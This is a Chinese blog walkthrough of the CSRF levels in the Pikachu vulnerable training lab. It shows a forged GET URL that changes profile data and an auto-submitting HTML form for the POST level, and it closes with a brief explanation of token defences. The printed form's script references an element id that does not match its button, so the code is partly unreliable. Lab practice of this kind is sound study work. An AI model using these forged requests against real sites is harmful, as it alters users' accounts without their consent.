pikachu-CSRF通关教程

最新推荐文章于 2024-05-26 08:00:00 发布
最新推荐文章于 2024-05-26 08:00:00 发布
阅读量616 收藏
点赞数
分类专栏: 靶场 文章标签: csrf 前端 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71518346/article/details/128252976
版权

CSRF(跨站请求伪造)

概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。

CSRF(get)

关于这关的意义不是很明白,有懂的可以在下面评论区说一下。下面看过程吧。

根据他给的用户名和密码随便进一个,然后发现修改的信息并不会在URL里面显示,然后拿bp抓包,抓的是修改信息内。

发现他的可以修改信息,直接在里面修改完放行,他的个人信息就可以修改完了。

还可以就是把这段   /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=22&email=vince%40pikachu.com&submit=submit 复制下来加上http和主机地址补充完整,去访问这段网址,直接会跳到修改信息的界面。直接在连接里面改也可以。访问就是直接改完的。图就不放了。

 CSRF(post)

发现URL不再显示参数,无法通过URL来伪造请求进行修改,但是本页面可以抓到可以修改的参数,可以通过bp直接修改。方法二:构造表单,这个我试了几次才成功,代码放下面了。

<!DOCTYPE html>
<html>
	<head lang="en">
		<meta charset="utf-8">
		<title>csrf的post</title>
		<script>     <!-- 这个script是用来自动提交表单的-->
		window.onload = function() {
			document.getElementById("submit").click();
		}
		</script>
	</head>
	<body>
		<form action="http://192.168.0.105/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
			<input type="text" name="sex" value="boy" />
			<input type="kobe" name="phonenum" value="18626545453" />
			<input type="kobe" name="add" value="9" />
			<input type="kobe" name="email" value="vince@pikachu.com" />
			<input id="postsubmit" type="submit" name="submit" value="submit" />   
		</form>
	</body>
</html>

 CSRF Token

这关是防范CSRF的常用方法的一个演示。

token验证原理
CSRF的主要问题是敏感操作的链接容易被伪造
每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对随机码进行验证

网页接受从后台发过来的token,类型不可见。将其一并提交给后台进行验证。每次刷新,后台发送过来的token都不一样,起到了防止伪造的作用。

有原则的兔子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu通关教程CSRF
Bu2n的博客
12-08 1379
CSRF(get)CSRF(post)CSRF Token CSRF(get) 登录vince的账号 修改手机号 抓包看到是个get请求 打开一个新网页,利用上面的参数,构造一个url,这里我把手机号改为120(这里是模拟钓鱼网站跳转到恶意的url) 手机号修改成功 CSRF(post) 登录vince账号,尝试修改信息,抓包,发现是post请求 这下就不能直接用url跳转进行CSRF攻击了,得伪造一个表单页面,让用户去访问。 表单代码如下 js代码意思是当页面加载完毕,自动点击提交按钮,.
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu通关3 -CSRF
m0_62677808的博客
12-09 205
我们先根据右边的提示登录用户我们点击修改个人信息,然后用burpsuite抓包我们把请求的链接复制出来然后对链接进行修改将这个链接复制到pikachu的浏览器然后回车,我们的信息也被修改了。
pikachu靶场中的CSRF、SSRF通关
最新发布
qq_68163788的博客
05-26 1906
Pikachu靶场中,CSRF(Cross-Site Request Forgery)和SSRF(Server-Side Request Forgery)是两种常见的Web安全漏洞。CSRF攻击利用用户在已认证的Web应用程序上执行未经意的操作,通过伪装请求来执行恶意操作,例如更改用户密码或发送资金。而SSRF漏洞则允许攻击者从受害服务器上执行请求,可能导致访问内部系统、绕过防火墙或执行其他恶意操作。
pikachu靶场通关CSRF
Python毕设源码程序王哥
04-12 1640
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu通关记之CSRF跨站请求伪造
qq_35258210的博客
01-17 296
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 CSRF(get请求) CSRF(POST请求) CSRF Token Ps:靶机链接:在我博客置顶 实战环境下需要有这以下四个角色 被攻击者、
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikache靶场通关——CSRF攻击
p36273的博客
07-01 1528
靶场一共又三关,现在我们就来通关吧。
[PiKaChu靶场通关]CSRF
网络安全知识分享
10-12 3977
[PiKaChu靶场通关]CSRF一、介绍二、攻击细节三、防御措施检查Referer字段添加校验token四、靶场内容CSRF(GET) 一、介绍 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网
PikachuCSRF
weixin_48621644的博客
10-17 1928
小羊学安全 任重而道远~
pikachu靶场通关-CSRF跨站请求伪造
qq_43381463的博客
02-12 213
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachuCSRF
Cwillchris的博客
10-31 308
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、CSRF(get) login 用之前的密码登录都不会,点提示,账户有几个,密码都是123456,那直接一个个试一下 使用vince:123456 成功登录,点修改个人信息 打开BP抓包,随便输入,点击提交 发现没有token验证,那直接放包就可以修改了 二、CSRF(post) 打开B
Pikachu系列——CSRF
Zlirving_的博客
05-15 1231
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF CSRF概述 跨站请求伪造简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。 CSRF类型判断 GET: 先去掉参数尝试能否正常请求。如果可以,即存在CSRF漏洞。 POST: 如果有token等验证参数,先去掉参数尝试能否正常请求。如果可以,再去掉referer参数的内容,如果仍然可以,说
pikachu靶场- CSRF闯关,文件包含、文件上传
akucoco的博客
02-11 641
pikachu靶场- CSRF闯关,文件包含、文件上传
pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列)
箭雨镜屋
04-14 8115
一、官方介绍 本节引用内容来自pikachu漏洞平台(删了一些内容,留下了最重要的部分,并为精炼语言进行了一些修改) 1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。 3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如: --对敏感信息的操作增加安全
pikachu靶场通关(上)
qq_65950075的博客
04-08 886
第一关:暴力破解1.1基于表单的暴力破解首先打开burp suite拦截,然后在随意输入账号密码,可在burpsuite上抓到皮卡丘的包,可以看到刚才输入的账号密码我们选择放包,然后看到提示“用户名或密码不存在”,说明刚刚随便输入的账号密码是错的(废话)这怎么办呢,可以看到右上角有提示,我们点开发现三个账号密码,其中肯定有一个是正确的,当然我们可以一个一个地试。但是数量多的话我们就不好试了。把这三个记下来,下面用到。再次随便输入账号密码,拦截抓包发送攻击类型选择集束炸弹。
pikachu靶场csrf通关
05-06
Pikachu靶场是一个用于学习网络安全的虚拟...通关Pikachu靶场中的CSRF挑战需要先了解什么是CSRF漏洞,然后通过修改请求参数等手段来伪造请求,实现攻击目标网站。具体的挑战流程可以参考Pikachu靶场中的提示和指引。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值